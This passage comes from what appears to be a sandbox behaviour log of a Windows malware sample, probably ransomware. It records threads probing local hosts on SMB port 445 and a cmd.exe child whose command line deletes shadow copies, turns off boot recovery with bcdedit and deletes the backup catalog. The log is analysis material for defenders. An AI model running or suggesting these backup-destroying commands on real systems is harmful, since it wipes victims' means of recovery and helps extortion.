tv_usec=0)) Thread: id = 218 os_tid = 0xd98 [0098.083] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980d00 [0098.083] free (_Block=0x3980d00) [0098.083] inet_addr (cp="192.168.0.68") returned 0x4400a8c0 [0098.083] htons (hostshort=0x1bd) returned 0xbd01 [0098.083] socket (af=2, type=1, protocol=6) returned 0xff4 [0098.085] ioctlsocket (in: s=0xff4, cmd=-2147195266, argp=0x129cff44 | out: argp=0x129cff44) returned 0 [0098.085] connect (s=0xff4, name=0x129cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.68"), namelen=16) returned -1 [0098.086] WSAGetLastError () returned 10035 [0098.086] select (nfds=0, readfds=0x0, writefds=0x129cfd18, exceptfds=0x129cfe20, timeout=0x129cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 219 os_tid = 0xf14 [0098.086] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980cd8 [0098.086] free (_Block=0x3980cd8) [0098.086] inet_addr (cp="192.168.0.67") returned 0x4300a8c0 [0098.086] htons (hostshort=0x1bd) returned 0xbd01 [0098.086] socket (af=2, type=1, protocol=6) returned 0x1004 [0098.086] ioctlsocket (in: s=0x1004, cmd=-2147195266, argp=0x12b0ff44 | out: argp=0x12b0ff44) returned 0 [0098.087] connect (s=0x1004, name=0x12b0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.67"), namelen=16) returned -1 [0098.087] WSAGetLastError () returned 10035 [0098.087] select (nfds=0, readfds=0x0, writefds=0x12b0fd18, exceptfds=0x12b0fe20, timeout=0x12b0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 220 os_tid = 0xd94 [0098.087] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980c80 [0098.087] free (_Block=0x3980c80) [0098.088] inet_addr (cp="192.168.0.66") returned 0x4200a8c0 [0098.088] htons (hostshort=0x1bd) returned 0xbd01 [0098.088] socket (af=2, type=1, protocol=6) returned 0x1010 [0098.088] ioctlsocket (in: s=0x1010, cmd=-2147195266, argp=0x12c4ff44 | out: argp=0x12c4ff44) returned 0 [0098.088] connect (s=0x1010, name=0x12c4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.66"), namelen=16) returned -1 [0098.089] WSAGetLastError () returned 10035 [0098.089] select (nfds=0, readfds=0x0, writefds=0x12c4fd18, exceptfds=0x12c4fe20, timeout=0x12c4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 221 os_tid = 0xd88 [0098.089] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980c58 [0098.089] free (_Block=0x3980c58) [0098.089] inet_addr (cp="192.168.0.65") returned 0x4100a8c0 [0098.089] htons (hostshort=0x1bd) returned 0xbd01 [0098.089] socket (af=2, type=1, protocol=6) returned 0x101c [0098.091] ioctlsocket (in: s=0x101c, cmd=-2147195266, argp=0x12d8ff44 | out: argp=0x12d8ff44) returned 0 [0098.091] connect (s=0x101c, name=0x12d8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.65"), namelen=16) returned -1 [0098.092] WSAGetLastError () returned 10035 [0098.092] select (nfds=0, readfds=0x0, writefds=0x12d8fd18, exceptfds=0x12d8fe20, timeout=0x12d8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 222 os_tid = 0xd8c [0098.093] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980c30 [0098.093] free (_Block=0x3980c30) [0098.093] inet_addr (cp="192.168.0.64") returned 0x4000a8c0 [0098.093] htons (hostshort=0x1bd) returned 0xbd01 [0098.093] socket (af=2, type=1, protocol=6) returned 0x1028 [0098.093] ioctlsocket (in: s=0x1028, cmd=-2147195266, argp=0x12ecff44 | out: argp=0x12ecff44) returned 0 [0098.093] connect (s=0x1028, name=0x12ecff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.64"), namelen=16) returned -1 [0098.094] WSAGetLastError () returned 10035 [0098.094] select (nfds=0, readfds=0x0, writefds=0x12ecfd18, exceptfds=0x12ecfe20, timeout=0x12ecff3c*(tv_sec=10, tv_usec=0)) Thread: id = 223 os_tid = 0xd90 [0098.096] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980c08 [0098.096] free (_Block=0x3980c08) [0098.096] inet_addr (cp="192.168.0.63") returned 0x3f00a8c0 [0098.096] htons (hostshort=0x1bd) returned 0xbd01 [0098.096] socket (af=2, type=1, protocol=6) returned 0x1034 [0098.097] ioctlsocket (in: s=0x1034, cmd=-2147195266, argp=0x1300ff44 | out: argp=0x1300ff44) returned 0 [0098.097] connect (s=0x1034, name=0x1300ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.63"), namelen=16) returned -1 [0098.097] WSAGetLastError () returned 10035 [0098.097] select (nfds=0, readfds=0x0, writefds=0x1300fd18, exceptfds=0x1300fe20, timeout=0x1300ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 224 os_tid = 0xd84 [0098.098] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980be0 [0098.098] free (_Block=0x3980be0) [0098.098] inet_addr (cp="192.168.0.62") returned 0x3e00a8c0 [0098.098] htons (hostshort=0x1bd) returned 0xbd01 [0098.098] socket (af=2, type=1, protocol=6) returned 0x1040 [0098.099] ioctlsocket (in: s=0x1040, cmd=-2147195266, argp=0x1314ff44 | out: argp=0x1314ff44) returned 0 [0098.099] connect (s=0x1040, name=0x1314ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.62"), namelen=16) returned -1 [0098.099] WSAGetLastError () returned 10035 [0098.099] select (nfds=0, readfds=0x0, writefds=0x1314fd18, exceptfds=0x1314fe20, timeout=0x1314ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 225 os_tid = 0xd80 [0098.100] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980bb8 [0098.100] free (_Block=0x3980bb8) [0098.100] inet_addr (cp="192.168.0.61") returned 0x3d00a8c0 [0098.100] htons (hostshort=0x1bd) returned 0xbd01 [0098.100] socket (af=2, type=1, protocol=6) returned 0x104c [0098.100] ioctlsocket (in: s=0x104c, cmd=-2147195266, argp=0x1328ff44 | out: argp=0x1328ff44) returned 0 [0098.100] connect (s=0x104c, name=0x1328ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.61"), namelen=16) returned -1 [0098.101] WSAGetLastError () returned 10035 [0098.101] select (nfds=0, readfds=0x0, writefds=0x1328fd18, exceptfds=0x1328fe20, timeout=0x1328ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 226 os_tid = 0x7ac [0098.101] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980b90 [0098.101] free (_Block=0x3980b90) [0098.101] inet_addr (cp="192.168.0.60") returned 0x3c00a8c0 [0098.101] htons (hostshort=0x1bd) returned 0xbd01 [0098.102] socket (af=2, type=1, protocol=6) returned 0x1058 [0098.103] ioctlsocket (in: s=0x1058, cmd=-2147195266, argp=0x133cff44 | out: argp=0x133cff44) returned 0 [0098.103] connect (s=0x1058, name=0x133cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.60"), namelen=16) returned -1 [0098.105] WSAGetLastError () returned 10035 [0098.105] select (nfds=0, readfds=0x0, writefds=0x133cfd18, exceptfds=0x133cfe20, timeout=0x133cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 227 os_tid = 0xf0c [0098.105] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980b68 [0098.105] free (_Block=0x3980b68) [0098.106] inet_addr (cp="192.168.0.59") returned 0x3b00a8c0 [0098.106] htons (hostshort=0x1bd) returned 0xbd01 [0098.106] socket (af=2, type=1, protocol=6) returned 0x1064 [0098.106] ioctlsocket (in: s=0x1064, cmd=-2147195266, argp=0x1350ff44 | out: argp=0x1350ff44) returned 0 [0098.106] connect (s=0x1064, name=0x1350ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.59"), namelen=16) returned -1 [0098.107] WSAGetLastError () returned 10035 [0098.107] select (nfds=0, readfds=0x0, writefds=0x1350fd18, exceptfds=0x1350fe20, timeout=0x1350ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 228 os_tid = 0xf00 [0098.107] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980b40 [0098.107] free (_Block=0x3980b40) [0098.107] inet_addr (cp="192.168.0.58") returned 0x3a00a8c0 [0098.107] htons (hostshort=0x1bd) returned 0xbd01 [0098.107] socket (af=2, type=1, protocol=6) returned 0x1070 [0098.108] ioctlsocket (in: s=0x1070, cmd=-2147195266, argp=0x1364ff44 | out: argp=0x1364ff44) returned 0 [0098.108] connect (s=0x1070, name=0x1364ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.58"), namelen=16) returned -1 [0098.108] WSAGetLastError () returned 10035 [0098.109] select (nfds=0, readfds=0x0, writefds=0x1364fd18, exceptfds=0x1364fe20, timeout=0x1364ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 229 os_tid = 0xefc [0098.109] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980b18 [0098.109] free (_Block=0x3980b18) [0098.109] inet_addr (cp="192.168.0.57") returned 0x3900a8c0 [0098.109] htons (hostshort=0x1bd) returned 0xbd01 [0098.109] socket (af=2, type=1, protocol=6) returned 0x107c [0098.110] ioctlsocket (in: s=0x107c, cmd=-2147195266, argp=0x1378ff44 | out: argp=0x1378ff44) returned 0 [0098.110] connect (s=0x107c, name=0x1378ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.57"), namelen=16) returned -1 [0098.110] WSAGetLastError () returned 10035 [0098.110] select (nfds=0, readfds=0x0, writefds=0x1378fd18, exceptfds=0x1378fe20, timeout=0x1378ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 230 os_tid = 0xef8 [0098.111] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980af0 [0098.111] free (_Block=0x3980af0) [0098.111] inet_addr (cp="192.168.0.56") returned 0x3800a8c0 [0098.111] htons (hostshort=0x1bd) returned 0xbd01 [0098.111] socket (af=2, type=1, protocol=6) returned 0x1088 [0098.111] ioctlsocket (in: s=0x1088, cmd=-2147195266, argp=0x138cff44 | out: argp=0x138cff44) returned 0 [0098.111] connect (s=0x1088, name=0x138cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.56"), namelen=16) returned -1 [0098.112] WSAGetLastError () returned 10035 [0098.112] select (nfds=0, readfds=0x0, writefds=0x138cfd18, exceptfds=0x138cfe20, timeout=0x138cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 231 os_tid = 0xed0 [0098.112] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980ac8 [0098.112] free (_Block=0x3980ac8) [0098.112] inet_addr (cp="192.168.0.55") returned 0x3700a8c0 [0098.113] htons (hostshort=0x1bd) returned 0xbd01 [0098.113] socket (af=2, type=1, protocol=6) returned 0x1094 [0098.113] ioctlsocket (in: s=0x1094, cmd=-2147195266, argp=0x13a0ff44 | out: argp=0x13a0ff44) returned 0 [0098.113] connect (s=0x1094, name=0x13a0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.55"), namelen=16) returned -1 [0098.113] WSAGetLastError () returned 10035 [0098.113] select (nfds=0, readfds=0x0, writefds=0x13a0fd18, exceptfds=0x13a0fe20, timeout=0x13a0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 232 os_tid = 0xf10 [0098.114] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980aa0 [0098.114] free (_Block=0x3980aa0) [0098.114] inet_addr (cp="192.168.0.54") returned 0x3600a8c0 [0098.114] htons (hostshort=0x1bd) returned 0xbd01 [0098.114] socket (af=2, type=1, protocol=6) returned 0x10a0 [0098.114] ioctlsocket (in: s=0x10a0, cmd=-2147195266, argp=0x13b4ff44 | out: argp=0x13b4ff44) returned 0 [0098.114] connect (s=0x10a0, name=0x13b4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.54"), namelen=16) returned -1 [0098.115] WSAGetLastError () returned 10035 [0098.115] select (nfds=0, readfds=0x0, writefds=0x13b4fd18, exceptfds=0x13b4fe20, timeout=0x13b4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 233 os_tid = 0xec8 [0098.115] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980a78 [0098.115] free (_Block=0x3980a78) [0098.115] inet_addr (cp="192.168.0.53") returned 0x3500a8c0 [0098.115] htons (hostshort=0x1bd) returned 0xbd01 [0098.115] socket (af=2, type=1, protocol=6) returned 0x10ac [0098.117] ioctlsocket (in: s=0x10ac, cmd=-2147195266, argp=0x13c8ff44 | out: argp=0x13c8ff44) returned 0 [0098.117] connect (s=0x10ac, name=0x13c8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.53"), namelen=16) returned -1 [0098.117] WSAGetLastError () returned 10035 [0098.117] select (nfds=0, readfds=0x0, writefds=0x13c8fd18, exceptfds=0x13c8fe20, timeout=0x13c8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 234 os_tid = 0xf34 [0098.118] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980a50 [0098.118] free (_Block=0x3980a50) [0098.118] inet_addr (cp="192.168.0.52") returned 0x3400a8c0 [0098.118] htons (hostshort=0x1bd) returned 0xbd01 [0098.118] socket (af=2, type=1, protocol=6) returned 0x10b8 [0098.118] ioctlsocket (in: s=0x10b8, cmd=-2147195266, argp=0x13dcff44 | out: argp=0x13dcff44) returned 0 [0098.118] connect (s=0x10b8, name=0x13dcff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.52"), namelen=16) returned -1 [0098.118] WSAGetLastError () returned 10035 [0098.118] select (nfds=0, readfds=0x0, writefds=0x13dcfd18, exceptfds=0x13dcfe20, timeout=0x13dcff3c*(tv_sec=10, tv_usec=0)) Thread: id = 235 os_tid = 0xeb4 [0098.119] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980a28 [0098.119] free (_Block=0x3980a28) [0098.119] inet_addr (cp="192.168.0.51") returned 0x3300a8c0 [0098.119] htons (hostshort=0x1bd) returned 0xbd01 [0098.119] socket (af=2, type=1, protocol=6) returned 0x10c4 [0098.119] ioctlsocket (in: s=0x10c4, cmd=-2147195266, argp=0x13f0ff44 | out: argp=0x13f0ff44) returned 0 [0098.119] connect (s=0x10c4, name=0x13f0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.51"), namelen=16) returned -1 [0098.120] WSAGetLastError () returned 10035 [0098.120] select (nfds=0, readfds=0x0, writefds=0x13f0fd18, exceptfds=0x13f0fe20, timeout=0x13f0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 236 os_tid = 0xf38 [0098.120] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980a00 [0098.120] free (_Block=0x3980a00) [0098.120] inet_addr (cp="192.168.0.50") returned 0x3200a8c0 [0098.120] htons (hostshort=0x1bd) returned 0xbd01 [0098.120] socket (af=2, type=1, protocol=6) returned 0x10d0 [0098.121] ioctlsocket (in: s=0x10d0, cmd=-2147195266, argp=0x1404ff44 | out: argp=0x1404ff44) returned 0 [0098.121] connect (s=0x10d0, name=0x1404ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.50"), namelen=16) returned -1 [0098.121] WSAGetLastError () returned 10035 [0098.121] select (nfds=0, readfds=0x0, writefds=0x1404fd18, exceptfds=0x1404fe20, timeout=0x1404ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 237 os_tid = 0xecc Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x453a3000" os_pid = "0xfcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf64" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f2de" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 583 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 584 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 585 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 586 start_va = 0x120000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 587 start_va = 0x4a830000 end_va = 0x4a888fff monitored = 1 entry_point = 0x4a8390b4 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 588 start_va = 0x76f70000 end_va = 0x77118fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 589 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 590 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 591 start_va = 0x7fff3000 end_va = 0x7fff3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff3000" filename = "" Region: id = 592 start_va = 0x7feff290000 end_va = 0x7feff290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 593 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 594 start_va = 0x7fffffda000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 595 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 617 start_va = 0x3f0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 618 start_va = 0x76e50000 end_va = 0x76f6efff monitored = 0 entry_point = 0x76e65340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 619 start_va = 0x7fefd1c0000 end_va = 0x7fefd22bfff monitored = 0 entry_point = 0x7fefd1c2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 620 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 621 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 622 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 623 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 624 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 625 start_va = 0x7feff140000 end_va = 0x7feff1defff monitored = 0 entry_point = 0x7feff1425a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 626 start_va = 0x7fefafa0000 end_va = 0x7fefafa7fff monitored = 0 entry_point = 0x7fefafa11a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 627 start_va = 0x76d50000 end_va = 0x76e49fff monitored = 0 entry_point = 0x76d6a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 628 start_va = 0x7fefe770000 end_va = 0x7fefe7d6fff monitored = 0 entry_point = 0x7fefe77b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 629 start_va = 0x7fefebb0000 end_va = 0x7fefebbdfff monitored = 0 entry_point = 0x7fefebb1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 630 start_va = 0x7fefe7e0000 end_va = 0x7fefe8a8fff monitored = 0 entry_point = 0x7fefe85a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 631 start_va = 0x4f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 632 start_va = 0x220000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 633 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 634 start_va = 0x4f0000 end_va = 0x677fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 635 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 636 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 637 start_va = 0x7fefea90000 end_va = 0x7fefeabdfff monitored = 0 entry_point = 0x7fefea91010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 638 start_va = 0x7fefee20000 end_va = 0x7fefef28fff monitored = 0 entry_point = 0x7fefee21064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 639 start_va = 0x6f0000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 640 start_va = 0x880000 end_va = 0x1c7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 641 start_va = 0xc0000 end_va = 0xdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 642 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 643 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 644 start_va = 0x1c80000 end_va = 0x1f4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 22 os_tid = 0xfd0 [0080.423] GetProcAddress (hModule=0x76e50000, lpProcName="SetConsoleInputExeNameW") returned 0x76e60c80 [0080.424] GetProcessHeap () returned 0x3f0000 [0080.424] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4012) returned 0x40c460 [0080.424] GetProcessHeap () returned 0x3f0000 [0080.424] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40c460 | out: hHeap=0x3f0000) returned 1 [0080.425] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0080.425] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0080.425] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0080.425] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0080.425] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0080.425] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0080.425] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0080.425] GetProcessHeap () returned 0x3f0000 [0080.425] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x409f20 [0080.425] GetProcessHeap () returned 0x3f0000 [0080.425] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x22) returned 0x4047f0 [0080.426] GetProcessHeap () returned 0x3f0000 [0080.426] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4a) returned 0x409fe0 [0080.427] GetProcessHeap () returned 0x3f0000 [0080.427] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x40a040 [0080.427] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0080.427] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0080.427] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0080.427] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0080.427] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0080.427] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0080.427] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0080.427] GetProcessHeap () returned 0x3f0000 [0080.427] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x40a100 [0080.427] GetProcessHeap () returned 0x3f0000 [0080.427] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1a) returned 0x404820 [0080.428] GetProcessHeap () returned 0x3f0000 [0080.428] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x38) returned 0x4067c0 [0080.428] GetProcessHeap () returned 0x3f0000 [0080.429] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x40a1c0 [0080.429] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0080.429] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0080.429] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0080.429] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0080.429] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0080.429] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0080.429] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0080.429] GetProcessHeap () returned 0x3f0000 [0080.429] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x40a280 [0080.429] GetProcessHeap () returned 0x3f0000 [0080.430] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x404850 [0080.431] GetProcessHeap () returned 0x3f0000 [0080.431] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x78) returned 0x3f1320 [0080.431] GetProcessHeap () returned 0x3f0000 [0080.431] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x3f13a0 [0080.432] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0080.432] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0080.432] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 